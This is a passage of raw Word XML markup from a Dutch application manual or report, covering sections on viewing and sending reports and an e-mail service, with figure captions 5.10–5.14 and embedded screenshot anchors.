                <wp:docPr id="173" name="Rectangle 17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EACAF" id="Rectangle 173" o:spid="_x0000_s1026" style="position:absolute;margin-left:-72.05pt;margin-top:-71.8pt;width:25pt;height:1031.7pt;z-index:-2502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5QAZUCAACz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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004D0768">
        <w:t>Rapporten inzien en verzenden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D0C7C" w14:textId="5786EDA1" w:rsidR="004D0768" w:rsidRDefault="0043602E" w:rsidP="004D0768">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253218816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E57101A" wp14:editId="6DFA95B8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5690235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1960245</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="808" name="Text Box 808"/>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7A364" w14:textId="5F496AFD" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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101A" id="Text Box 808" o:spid="_x0000_s1212" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:448.05pt;margin-top:154.35pt;width:65pt;height:36pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5567A364" w14:textId="5F496AFD" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.10</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004D0768">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253070336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A2516CF" wp14:editId="62C5A2A3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-88265</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>247015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2198370"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="3683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report admin.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21983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6FED8A8" w14:textId="39ED6197" w:rsidR="004D0768" w:rsidRDefault="0030794F" w:rsidP="004D0768">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253154304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17CA5AA0" wp14:editId="6311F2AB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2338070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5651500" cy="688340"/>
                <wp:effectExtent l="0" t="0" r="38100" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="677" name="Text Box 677"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5651500" cy="688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1509A5E" w14:textId="4C3DF569" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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5AA0" id="Text Box 677" o:spid="_x0000_s1213" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:184.1pt;width:445pt;height:54.2pt;z-index:2531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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="21509A5E" w14:textId="4C3DF569" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CA7DE6" w14:textId="12CAF31A" w:rsidR="004D0768" w:rsidRDefault="0043602E" w:rsidP="004D0768">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253219840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EDCF92D" wp14:editId="037E8D85">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5813425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3631565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="762000" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="809" name="Text Box 80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78F8B" w14:textId="2152B2D4" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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CF92D" id="Text Box 809" o:spid="_x0000_s1214" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:457.75pt;margin-top:285.95pt;width:60pt;height:36pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="26678F8B" w14:textId="2152B2D4" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.11</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4A6C62" w14:textId="12D8B598" w:rsidR="004D0768" w:rsidRDefault="00DC7ADA" w:rsidP="004D0768">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253073408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EBB4DE8" wp14:editId="190D5E3A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3213100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5774690" cy="916940"/>
                <wp:effectExtent l="0" t="0" r="16510" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="42" name="Text Box 42"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5774690" cy="9169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9E9759" w14:textId="15AD5FC2" w:rsidR="00E2204E" w:rsidRPr="007C19DC" w:rsidRDefault="00E2204E">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4DE8" id="Text Box 42" o:spid="_x0000_s1215" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:253pt;width:454.7pt;height:72.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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="639E9759" w14:textId="15AD5FC2" w:rsidR="00E2204E" w:rsidRPr="007C19DC" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00952F29">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253072384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1FE47095" wp14:editId="3D7F1688">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3018790"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="2921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verzend rapport.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301879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152CDB53" w14:textId="77777777" w:rsidR="004D0768" w:rsidRDefault="004D0768" w:rsidP="004D0768"/>
    <w:p w14:paraId="0329BF3A" w14:textId="000714FC" w:rsidR="00256686" w:rsidRDefault="008720A4" w:rsidP="00557C84">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00614F53">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253084672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7EC97B5B" wp14:editId="6FE6084F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>347980</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5778500" cy="1145540"/>
                <wp:effectExtent l="0" t="0" r="38100" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="751" name="Text Box 751"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5778500" cy="11455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F413C4C" w14:textId="6D392493" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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97B5B" id="Text Box 751" o:spid="_x0000_s1216" type="#_x0000_t202" style="position:absolute;margin-left:-2pt;margin-top:27.4pt;width:455pt;height:90.2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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4F413C4C" w14:textId="6D392493" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CE504D" w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253079552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="064C2ABA" wp14:editId="46800572">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-913653</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="232" name="Rectangle 2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3650D" id="Rectangle 232" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.95pt;margin-top:-71.9pt;width:25pt;height:1031.7pt;z-index:-2502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wy5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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00557C84">
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:r>
        <w:t>Rapport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFC06F" w14:textId="77777777" w:rsidR="00C553AB" w:rsidRDefault="00C553AB" w:rsidP="00256686"/>
    <w:p w14:paraId="78A555B1" w14:textId="579FBF8E" w:rsidR="00B26A80" w:rsidRDefault="00F03C4F" w:rsidP="00256686">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253220864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26849031" wp14:editId="47C26F07">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5816600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6758305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="767080" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="814" name="Text Box 814"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="76708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6F049" w14:textId="0592CA99" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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49031" id="Text Box 814" o:spid="_x0000_s1217" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:458pt;margin-top:532.15pt;width:60.4pt;height:36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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7926F049" w14:textId="0592CA99" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.12</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B26A80">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253074432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0ADC7272" wp14:editId="4CC3C457">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>397510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="6603365"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="260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B26A80">
        <w:t>Pagina 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79566F6E" w14:textId="59BE4258" w:rsidR="00B26A80" w:rsidRDefault="00B26A80"/>
    <w:p w14:paraId="25B3C091" w14:textId="28913317" w:rsidR="00774007" w:rsidRDefault="0091607A">
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253081600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35A26EA9" wp14:editId="6561BCA4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-914587</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="248" name="Rectangle 2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636A5" id="Rectangle 248" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.9pt;margin-top:-71.95pt;width:25pt;height:1031.7pt;z-index:-2502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FLJ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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D687A" w14:textId="28D5CCB3" w:rsidR="00997F2E" w:rsidRDefault="00B26A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253075456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CC35892" wp14:editId="7722E39F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-25400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>342265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5652135" cy="4658995"/>
            <wp:effectExtent l="0" t="0" r="12065"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port page 2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5652135" cy="4658995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Pagina 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CFE8FD" w14:textId="2D1AC5CC" w:rsidR="00997F2E" w:rsidRDefault="00C91600">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253221888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18C4E45F" wp14:editId="73ED655C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-93980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4872990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="762000" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="819" name="Text Box 81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C46FC" w14:textId="3B43B78F" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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4E45F" id="Text Box 819" o:spid="_x0000_s1218" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-7.4pt;margin-top:383.7pt;width:60pt;height:36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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5A1C46FC" w14:textId="3B43B78F" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.13</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4242547E" w14:textId="77777777" w:rsidR="00A6372D" w:rsidRDefault="00A6372D">
      <w:pPr>
        <w:sectPr w:rsidR="00A6372D" w:rsidSect="00241096">
          <w:headerReference w:type="default" r:id="rId100"/>
          <w:headerReference w:type="first" r:id="rId101"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="402" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799FD4CC" w14:textId="47086494" w:rsidR="00A83B83" w:rsidRDefault="00A83B83">
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253083648" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71D4419A" wp14:editId="34E90EC1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-915857</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="747" name="Rectangle 7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E01B0" id="Rectangle 747" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.9pt;margin-top:-72.05pt;width:25pt;height:1031.7pt;z-index:-2502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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE7C4CC" w14:textId="4B4F4C26" w:rsidR="00A83B83" w:rsidRDefault="00557C84" w:rsidP="00557C84">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 </w:t>
      </w:r>
      <w:r w:rsidR="00A83B83">
        <w:t>E-mail Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578CB399" w14:textId="342F672B" w:rsidR="00E83033" w:rsidRDefault="005A6B3A" w:rsidP="00E83033">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253088768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1995A6E1" wp14:editId="57952AC3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>280670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842000" cy="802640"/>
                <wp:effectExtent l="0" t="0" r="25400" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="755" name="Text Box 755"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5842000"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568ED0D" w14:textId="3B898F0A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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5A6E1" id="Text Box 755" o:spid="_x0000_s1219" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:22.1pt;width:460pt;height:63.2pt;z-index:2530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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1568ED0D" w14:textId="3B898F0A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2E499" w14:textId="328A4FD8" w:rsidR="00E83033" w:rsidRPr="00E83033" w:rsidRDefault="00E83033" w:rsidP="00E83033"/>
    <w:p w14:paraId="5250F1B6" w14:textId="1C6F0B79" w:rsidR="00873418" w:rsidRDefault="009404C6" w:rsidP="00EB3DC5">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B17E6F0" wp14:editId="26179C5A">
            <wp:extent cx="5731510" cy="2553970"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="3683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gistratie e-mail.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2553970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="bg2"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F03C4F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253222912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EAD8ACB" wp14:editId="7E5C95FE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>38735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2745740</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1460500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="820" name="Text Box 820"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1460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34E58" w14:textId="3926FFD6" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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8ACB" id="Text Box 820" o:spid="_x0000_s1220" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.05pt;margin-top:216.2pt;width:115pt;height:18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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4D834E58" w14:textId="3926FFD6" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.14</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C09E8" w14:textId="03671EE0" w:rsidR="00873418" w:rsidRDefault="00F03C4F" w:rsidP="00EB3DC5">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
